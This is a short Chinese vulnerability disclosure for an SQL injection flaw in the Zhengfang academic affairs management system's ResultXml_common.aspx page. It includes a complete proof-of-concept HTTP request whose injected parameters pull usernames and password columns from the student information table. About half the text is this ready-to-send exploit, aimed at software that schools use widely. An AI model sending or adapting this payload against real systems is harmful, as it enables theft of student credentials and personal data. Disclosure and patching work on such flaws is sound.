漏洞描述
【漏洞对象】正方教务管理系统 【漏洞描述】正方教务管理系统的ResultXml_common.aspx文件存在SQL注入漏洞,可造成信息数据泄露,攻击者可利用该漏洞执行SQL指令,甚至入侵服务器。
正方教务管理系统ResultXml_common.aspx-SQL注入
PoC代码
GET /ResultXml_common.aspx?k=%&column='[username='||xh||']['||'passwd='||mm||']'&table=xsjbxxb+where+rownum<=10--+ HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Cookie: JSESSIONID=098DD6A1CCA0D3EE9CB8484C62B413E4; route=a7dcef3bb2d661a0ccea768068853fda
Testhead: TestValue
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36